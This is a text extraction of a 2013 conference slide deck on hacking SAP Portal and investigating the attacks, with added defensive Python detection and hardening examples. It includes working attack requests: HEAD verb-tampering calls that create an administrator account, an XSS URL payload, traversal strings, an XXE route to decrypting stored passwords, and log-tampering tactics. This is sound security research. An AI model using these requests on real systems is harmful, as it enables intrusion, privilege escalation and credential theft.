sap portal hacking and forensics at confidence 2013
Post on 01-Jun-2018
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
1/88
Invest in security
to secure investments
SAP Portal: Hacking and forensics
Dmitry Chastukhin, Director of SAP pentest/research team
Evgeny Neyolov, Security analyst, (anti)forensics research
-
ERPScan
Leading SAP AG partner in the field of discovering security
vulnerabilities by the number of found vulnerabilities
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat
(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge on SAP research.
2erpscan.com ERPScan invest in security to secure investments
-
Dmitry Chastukhin
Business application security expert
Yet another security researcher
-
Agenda
SAP security
SAP forensics WTF?!
Say hello to SAP Portal
Breaking SAP Portal
Catch me if you can
Conclusion
-
SAP
The most popular business application
More than 180000 customers worldwide
More than 70% of Forbes 500 run SAP
More than 40% of ERP market in Poland
-
SAP security
Espionage:
Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud:
False transactions
Modification of master data
Sabotage:
Denial of service
Modification of financial reports
Access to technology network (SCADA) by trust relations
-
[Chart: number of SAP security talks per year, 2003-2013, by conference: BlackHat, Defcon, HITB, RSA, CONFidence, DeepSec, Hacktivity, Troopers, Source]
Source: SAP Security in Figures 2013
http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
-
How easy? SAP Security Notes
More than 2600 in total
-
Is it remotely exploitable?
> 5000 non-web SAP services exposed in the world
including Dispatcher, Message server, SapHostControl, etc.
sapscan.com
-
What about other services?
[Chart: number of exposed SAP services found worldwide, by service: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
-
What about unpublished threats?
Companies are not interested in publishing information about their breaches
There are a lot of internal breaches thanks to unnecessarily
given authorizations (An employee by mistake buys hundreds of
excavators instead of ten)
There are known stories about backdoors left by developers in
custom ABAP code
How can you be sure that, if a breach occurs, you can find
evidence?
-
SAP Forensics
If no attacks are seen, it doesn't mean anything
Companies don't like to share it
Companies don't use security audit (~10%)
Even if used, nobody manages it (~5%)
Even if managed, no correlation (~1%)
-
Typical SAP audit options*
ICM log (icm/HTTP/logging_0): 70%
Security audit log in ABAP: 10%
Table access logging (rec/client): 4%
Message Server log (ms/audit): 2%
SAP Gateway access log: 2%
* The percentage of companies is based on our security assessments and product implementations.
-
What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close, so we need to monitor them, at least
-
What do we need to monitor?
External attacks on SAP
Attack users and SAP GUI
SAP Portal and WEB
Exposed SAP services
SAProuter
* Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.
Awareness
Secure configuration and patch management
Disable them
Too many issues and custom configuration
Can be 0-days
Need to concentrate on this area
-
Say hello to Portal
Point of web access to SAP systems
Point of web access to other corporate systems
Way for attackers to get access to SAP from the Internet
-
EP architecture
-
Okay, okay. SAP Portal is important, and it has many links to other modules.
So what?
-
SAP Logging
If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only* drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).
SOURCE: SAP HELP
* Not the only drawback: there are many complex attacks with POST requests.
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm
-
SAP J2EE Logging
Categories of system events recording:
System: all system-related security and administrative logs
Applications: all system events related to business logic
Performance: reserved for single activity tracing
Default location of these files in your file system:
\usr\sap\\\j2ee\cluster\\log\
-
21/88
SAP J2EE Logging
The developer trace files of the Java instance: \\work
The developer trace files of the central services: \\work\\log
Java server logs: \\j2ee\cluster\server\log
-
Full logging is not always the best option
-
SAP Management Console
-
SAP Management Console
SAP MMC: centralized system management
SAP MMC has remote commands
Commands are simple SOAP requests
Allowing to see the trace and log messages
It's not bad if you only use it sometimes and delete logs after use, but...
-
SAP Management Console
What can we find in logs?
Right! The file userinterface.log contains the calculated JSESSIONID
But... the attacker must have credentials to read the log file
WRONG!
-
SAP Management Console
SOAP request parameters shown on the slide (XML markup lost in extraction):
true
j2ee/cluster/server0/log/system/userinterface.log
%COUNT%
EOF
-
Prevention
LINK to SAP HELP
Don't use TRACE_LEVEL = 3
Delete traces when work is finished
Limit access to dangerous methods
Install notes 927637 and 1439348
Mask security-sensitive data in HTTP access log
http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
-
Prevention
LINK to SAP HELP
The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
By default, only for the headers listed below:
Path Parameter: jsessionid
Request Parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
HTTP Headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
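An added example (not SAP's HTTP Provider code and not from the talk) of the masking the slide describes, applied to a responses.trc-style access-log line and a request header dict before they are written out; the line layout, the sample request and the mask text "masked" are assumptions:

```python
"""Mask security-sensitive data before it is written to an HTTP access log.

Added example, not SAP's HTTP Provider implementation. It applies the default
masking list from the slides: the jsessionid path parameter, the request
parameters j_password, j_username, j_sap_password, j_sap_again, oldPassword,
confirmNewPassword and ticket, the Authorization header, and the JSESSIONID and
MYSAPSSO2 cookies. The log-line layout follows responses.trc as shown on the
slides; the mask text and the sample request are assumptions.
"""
import re

MASK = "masked"
MASKED_PATH_PARAMS = {"jsessionid"}
MASKED_QUERY_PARAMS = {"j_password", "j_username", "j_sap_password", "j_sap_again",
                       "oldpassword", "confirmnewpassword", "ticket"}
MASKED_HEADERS = {"authorization"}
MASKED_COOKIES = {"jsessionid", "mysapsso2"}

# ';name=value' path parameters and '?name=value' / '&name=value' query parameters.
_PARAM_RE = re.compile(
    r"([?&;])("
    + "|".join(re.escape(n) for n in sorted(MASKED_PATH_PARAMS | MASKED_QUERY_PARAMS))
    + r")=([^&;?#\s]*)", re.IGNORECASE)

# responses.trc layout: '[timestamp] - client : METHOD URL HTTP/x.y status size'
_LINE_RE = re.compile(r"^(.*\s:\s+)([A-Z]+\s+)(\S+)(\s+HTTP/\d\.\d.*)$")


def mask_url(url):
    """Replace the values of masked path and query parameters, keeping names and case."""
    return _PARAM_RE.sub(lambda m: f"{m.group(1)}{m.group(2)}={MASK}", url)


def mask_cookie(cookie_header):
    """Mask only the listed cookies; other cookies (and '=' inside their values) stay."""
    kept = []
    for item in cookie_header.split(";"):
        item = item.strip()
        if not item:
            continue
        name, _, _value = item.partition("=")
        kept.append(f"{name}={MASK}" if name.strip().lower() in MASKED_COOKIES else item)
    return "; ".join(kept)


def mask_headers(headers):
    """Return a copy of the header dict with Authorization and sensitive cookies masked."""
    masked = {}
    for name, value in headers.items():
        key = name.lower()
        if key in MASKED_HEADERS:
            masked[name] = MASK
        elif key == "cookie":
            masked[name] = mask_cookie(value)
        else:
            masked[name] = value
    return masked


def mask_access_log_line(line):
    """Mask the URL part of a responses.trc line; lines in another layout pass through."""
    m = _LINE_RE.match(line)
    if not m:
        return line
    return m.group(1) + m.group(2) + mask_url(m.group(3)) + m.group(4)


# Constructed sample: a login request whose line and headers must never be logged as-is.
SAMPLE_LINE = ("[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : GET "
               "/irj/portal;jsessionid=AbC123xyz?j_username=admin&j_password=s3cret&sap-language=EN "
               "HTTP/1.1 200 4096")
SAMPLE_HEADERS = {
    "Host": "portal.example",
    "Authorization": "Basic YWRtaW46czNjcmV0",
    "Cookie": "JSESSIONID=AbC123xyz; MYSAPSSO2=AjExMDAgAB; sap-usercontext=sap-client=001",
}

if __name__ == "__main__":
    print(mask_access_log_line(SAMPLE_LINE))
    print(mask_headers(SAMPLE_HEADERS))
```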
http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm
-
SAP NetWeaver J2EE
-
Access Control
Web Dynpro - programmatic
Portal iViews - programmatic
J2EE Web apps - declarative
Programmatic: by UME
Declarative: by WEB.XML
-
web.xml (slide excerpt; XML tags lost in extraction)
servlet-name: CriticalAction
servlet-class: com.sap.admin.Critical.Action
servlet-mapping: CriticalAction
-
Verb Tampering
If we are trying to get access to an application using GET, we need a login:pass and administrator role
What if we try to get access to the application using HEAD instead of GET?
PROFIT!
Did you know about ctc?
-
Verb Tampering
Need Admin account in SAP Portal?
Just send two HEAD requests
Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses JAVA database.
-
Prevention
Install SAP notes 1503579, 1616259, 1589525, 1624450
Install other SAP notes about Verb Tampering
Scan applications with ERPScan WEB.XML checker
Disable the applications that are not necessary
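An added example, not the ERPScan WEB.XML checker or any code from the talk, of the check such a scanner has to make: a security-constraint that lists http-method elements protects only those verbs, so anything else (HEAD in the ctc example above) reaches the servlet without the role check. The sample descriptor is constructed around the CriticalAction servlet from the slides; its url-patterns and role name are invented:

```python
"""Find J2EE security constraints that verb tampering can bypass.

Added example, not the ERPScan WEB.XML checker. A <security-constraint> whose
<web-resource-collection> lists <http-method> elements protects only those
verbs; a request with any other verb (HEAD, in the ctc example from the talk)
is dispatched to the servlet without the role check. Constraints that list no
<http-method> cover every verb and are not reported.
"""
import xml.etree.ElementTree as ET

# Constructed descriptor around the CriticalAction servlet named on the slides;
# the url-patterns and role name are invented for the example.
SAMPLE_WEB_XML = """\
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Critical</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>administrators</role-name></auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Reports</web-resource-name>
      <url-pattern>/reports/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>administrators</role-name></auth-constraint>
  </security-constraint>
</web-app>
"""

PROBE_VERBS = ("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE")


def _local(tag):
    """Drop the namespace so the checker works for any web-app schema version."""
    return tag.rsplit("}", 1)[-1]


def find_verb_tampering(web_xml_text):
    """Return [(resource name, [url patterns], [listed methods])] for every
    role-protected constraint that restricts itself to explicit HTTP methods."""
    root = ET.fromstring(web_xml_text)
    findings = []
    for constraint in root.iter():
        if _local(constraint.tag) != "security-constraint":
            continue
        # A constraint without a role requirement has nothing to bypass.
        roles = [r.text for r in constraint.iter() if _local(r.tag) == "role-name" and r.text]
        if not roles:
            continue
        for coll in constraint.iter():
            if _local(coll.tag) != "web-resource-collection":
                continue
            name = next((c.text for c in coll if _local(c.tag) == "web-resource-name"), "?")
            patterns = [c.text for c in coll if _local(c.tag) == "url-pattern"]
            methods = [c.text.strip().upper() for c in coll
                       if _local(c.tag) == "http-method" and c.text]
            if methods:
                findings.append((name, patterns, methods))
    return findings


def unprotected_verbs(methods, probe=PROBE_VERBS):
    """Verbs from the probe list that the constraint leaves unprotected."""
    return [v for v in probe if v not in methods]


if __name__ == "__main__":
    for name, patterns, methods in find_verb_tampering(SAMPLE_WEB_XML):
        print(f"{name} {patterns}: only {methods} require a role; "
              f"unprotected verbs: {unprotected_verbs(methods)}")
```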
-
Investigation
j2ee\cluster\\log\system\httpaccess\responses.trc
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
-
web.xml (slide excerpt; XML tags lost in extraction)
servlet-name: CriticalAction
servlet-class: com.sap.admin.Critical.Action
servlet-mapping: CriticalAction
-
Invoker Servlet
Want to execute an OS command on J2EE server remotely? Maybe upload a backdoor in a Java class?
Or sniff all traffic?
Still remember ctc?
-
Invoker Servlet
-
Prevention
Update to the latest patch: 1467771, 1445998
EnableInvokerServletGlobally must be false
Check all WEB.XML files with ERPScan WEBXML checker
-
Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
-
Investigation
-
XSS
Many XSSs in Portal
But sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal: EPCF
-
EPCF
EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page or IFrame
Every iView contains the EPCM object
For example, EPCF is used as a transient user data buffer for iViews:
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
-
Prevention
Install SAP note 1656549
-
Investigation
j2ee\cluster\\log\system\httpaccess\responses.trc
#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
-
Web Dynpro JAVA
Web Dynpro unauthorized modifications
For example:
somebody steals an account using XSS/CSRF/Sniffing
then tries to modify the severity level of logs
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
48/88
Web Dynpro JAVA
LINK to SAP HELP
http://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm
-
Investigation
No traces of change in default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
But sometimes we can find information by indirect signs:
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes
-
Investigation
Most actions have icons
They have to be loaded from the server
Usually, legitimate users have them all in cache
Attackers usually don't have them, so they make requests to the server
That's how we can identify potentially malicious actions
But there should be correlation with a real user's activity
False positives are possible:
New legitimate user
Old user clears cache
Other
-
Directory traversal
FIX
-
Directory traversal fix bypass
-
Prevention
Install SAP note 1630293
-
Investigation
Traversal patterns to search for in the logs:
/../
!252f..!252f
-
Breaking SAP Portal
Found a file in the OS of SAP Portal with the encrypted
passwords for administration and DB
Found a file in the OS of SAP Portal with keys to decrypt
passwords
Found a vulnerability (another one ;)) which allows reading the
files with passwords and keys
Decrypt passwords and log into Portal
PROFIT!
-
XXE in Portal
-
XXE in Portal
-
XXE
Error based XXE
-
XXE in Portal: Result
We can read any file
Including config with passwords
The SAP J2EE Engine stores the database user SAPDB; its password is here:
\usr\sap\\SYS\global\security\data\SecStore.properties
-
Where are the passwords? (config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
64/88
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?
-
config.properties (the key file is referenced by secstorefs.keyfile)
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
-
Get the password
We have an encrypted password
We have a key to decrypt it
We got the J2EE admin and JDBC
login:password!
-
Prevention
Install SAP note 1619539
Restrict read access to the files SecStore.properties and SecStore.key
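An added example (not from the talk or SAP) that turns the second prevention item into a check: it reads secstorefs.keyfile and secstorefs.secfile from config.properties, as listed on the earlier slides, and reports either file that is group- or world-accessible, missing, or not owned by the expected account. The sample config text is modelled on the slides; the expected owner UID is an assumption the caller supplies:

```python
"""Check that the J2EE secure store files are readable only by their owner.

Added example, not from the talk or SAP. It takes the secstorefs.keyfile and
secstorefs.secfile entries from config.properties (the two files the talk's
attack path reads) and reports a file that is group- or world-readable or
writable, missing, or owned by a different UID than expected. The expected
owner UID is an assumption the caller supplies (typically the <sid>adm user).
"""
import os
import stat

# Constructed config text modelled on the config.properties listing on the slides.
SAMPLE_CONFIG = """\
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTT/sapmnt/global/security/lib
rdbms.connection=jdbc/pool/TTT
"""

WANTED = {"secstorefs.keyfile": "keyfile", "secstorefs.secfile": "secfile"}


def read_secstore_paths(config_text):
    """Return {'keyfile': path, 'secfile': path} for the entries present in the text."""
    found = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.strip() in WANTED:
            found[WANTED[key.strip()]] = value.strip()
    return found


def check_file(path, expected_uid=None):
    """Return a list of problems for one secure-store file; an empty list means OK."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing"]
    mode = stat.S_IMODE(st.st_mode)
    problems = []
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        problems.append(f"{path}: readable by group/others (mode {mode:04o})")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append(f"{path}: writable by group/others (mode {mode:04o})")
    if expected_uid is not None and st.st_uid != expected_uid:
        problems.append(f"{path}: owned by uid {st.st_uid}, expected {expected_uid}")
    return problems


def check_secstore(config_text, expected_uid=None):
    """Check both secure-store files named in config.properties; [] means all good."""
    paths = read_secstore_paths(config_text)
    problems = []
    for name in ("keyfile", "secfile"):
        if name not in paths:
            problems.append(f"secstorefs.{name} not set in config.properties")
            continue
        problems.extend(check_file(paths[name], expected_uid))
    return problems


if __name__ == "__main__":
    # On a real system pass the text of the instance's config.properties here.
    for problem in check_secstore(SAMPLE_CONFIG) or ["no problems found"]:
        print(problem)
```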
-
Investigation
POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1
-
Investigation
The only way to get HTTP POST request values is to enable HTTP Trace:
Visual Administrator -> Dispatcher -> HTTP Provider -> Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
For 7.0 SP13 and higher:
/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
Manually analyze all requests for XXE attacks
-
Malicious file upload: Attack
Knowledge management allows uploading to the server
different types of files that can store malicious content
Sometimes, if guest access is allowed, it is possible to upload
any file without being an authenticated user
For example, it can be an HTML file with JavaScript that steals
cookies
-
Malicious file upload: Attack
-
Malicious file upload: Attack
-
Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
* Again, images can help us.
-
Malicious file upload: Prevention
Enable File Extension and Size Filter:
System Administration -> System Configuration -> Content Management -> Repository Filters -> Show Advanced Options -> File Extension and Size Filter
Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter
-
Malicious file upload: Prevention
Enable Malicious Script Filter:
System Administration -> System Configuration -> Content Management -> Repository Filters -> Show Advanced Options -> Malicious Script Filter
The filter also detects executable scripts in files that are being modified and encodes them when they are saved
Enable Forbidden Scripts: comma-separated list of banned script tags that will be encoded when the filter is applied
Enable the Send E-Mail to Administrator option
-
Portal post-exploitation
Lots of links to other systems in the corporate LAN
Using SSRF, attackers can get access to these systems
What is SSRF?
-
SSRF History: Basics
We send Packet A to Service A
Service A initiates Packet B to Service B
Services can be on the same or different hosts
We can manipulate some fields of Packet B within Packet A
Various SSRF attacks depend on how many fields we can control in Packet B
-
Partial Remote SSRF:
HTTP attacks on other services
[Diagram: a direct attack sends GET /vuln.jsp to HTTP server A; an SSRF attack sends the request to A, which relays GET /vuln.jsp to server B inside the corporate network]
-
Gopher uri scheme
Using the gopher:// uri scheme, it is possible to send TCP packets:
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
-
Portal post exploitation
-
Anti-forensics
-
Anti forensics
Flooding
Deleting
Changing
-
Anti forensics
Log flooding
5 active logs
Maximum log file size is 10 Mb
Archiving when all logs reach the maximum size
If file.0.log -> max size then open file.1.log
If file.4.log -> max size then zip all and backup
Rewriting the same files after archiving
-
Anti forensics
Log deleting
SAP locks write access only to the one active log
SAP allows reading/writing logs, so it is possible to delete them
It could compromise the attacker's presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
-
Securing SAP Portal
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
Own scripts, parse common patterns
ERPScan has all existing web vulns/0-day patterns
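An added example of the "own scripts, parse common patterns" approach, not code from the talk or ERPScan: it parses responses.trc lines in the layout shown on the earlier slides and applies the patterns discussed there (HEAD and ctc UserConfig calls on /ctc/ConfigServlet, script markers in URLs, the /../ and !252f..!252f traversal strings, and fresh loads of admin-UI icons such as the log configurator's warning.gif and KM's html.gif). The sample log mixes lines from the slides (with timestamps added where the slide had none) and constructed ones; the severity labels are my own:

```python
"""Flag the attack patterns from this talk in SAP J2EE responses.trc lines.

Added example, not code from the talk or ERPScan. Assumed line layout (from the
slides): '[timestamp] - client : METHOD URL HTTP/x.y status size'. Detections:
  - any request to /ctc/ConfigServlet (low), a non-GET/POST verb on it (high,
    verb tampering) and a com.sap.ctc.util.* parameter (high);
  - script markers in the URL after URL-decoding (medium, XSS attempt);
  - the traversal strings /../ and !252f..!252f (high);
  - GET requests for admin-UI icons (warning.gif of the log configurator, KM's
    /etc/public/mimes/images/*) that cached legitimate users rarely fetch (low,
    needs correlation with real user activity).
"""
import re
from urllib.parse import unquote

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]*)\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+(?P<url>\S+)"
    r"\s+HTTP/\d\.\d\s+(?P<status>\d{3})\s+(?P<size>\d+)"
)
TRAVERSAL_MARKERS = ("/../", "!252f..!252f")
ICON_MARKERS = ("/warning.gif", "/etc/public/mimes/images/")
SCRIPT_MARKERS = ("<script", "alert(", "javascript:")


def parse_line(line):
    """Return the fields of one responses.trc line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Return a list of (severity, reason) tags for one parsed record."""
    tags = []
    low = rec["url"].lower()
    decoded = unquote(unquote(low))  # catches single and double percent-encoding
    if low.startswith("/ctc/configservlet"):
        tags.append(("low", "access to ctc ConfigServlet (should be disabled if unused)"))
        if rec["method"] not in ("GET", "POST"):
            tags.append(("high", f"verb tampering: {rec['method']} on /ctc/ConfigServlet"))
        if "com.sap.ctc.util" in low:
            tags.append(("high", "ctc call with com.sap.ctc.util parameter (e.g. UserConfig)"))
    if any(mk in decoded for mk in SCRIPT_MARKERS):
        tags.append(("medium", "script markers in URL (XSS attempt)"))
    if any(mk in decoded or mk in low for mk in TRAVERSAL_MARKERS):
        tags.append(("high", "directory traversal pattern in URL"))
    if rec["method"] == "GET" and any(mk in low for mk in ICON_MARKERS):
        tags.append(("low", "admin-UI icon fetched from server; correlate with user activity"))
    return tags


def analyze(log_text):
    """Return [(client, method, url, tags)] for every line that got at least one tag."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["method"], rec["url"], tags))
    return hits


# Sample log: lines 1-6 are taken from the slides (timestamp on line 4 added),
# the last two lines are constructed.
SAMPLE_LOG = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
[Apr 3, 2013 1:41:10 AM ] - 192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
[Apr 10, 2013 2:30:00 AM ] - 192.168.192.22 : GET /irj/go/km/docs/!252f..!252f..!252ftest.txt HTTP/1.1 404 0
[Apr 10, 2013 2:31:00 AM ] - 10.0.0.5 : GET /irj/portal HTTP/1.1 200 12000
"""

if __name__ == "__main__":
    for client, method, url, tags in analyze(SAMPLE_LOG):
        for severity, reason in tags:
            print(f"{severity:6} {client:16} {method:5} {reason}  <- {url[:60]}")
```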
-
Future work
-
I'd like to thank SAP's Product Security Response Team for the
great cooperation to make SAP systems more secure. Research
is always ongoing, and we can't share all of it today. If you want
to be the first to see new attacks and demos, follow us at
@erpscan and attend future presentations:
July 31 BlackHat (Las Vegas, USA)
-
Web:
www.erpscan.com
e-mail: info@erpscan.com
Twitter:
@erpscan
@_chipik
@neyolov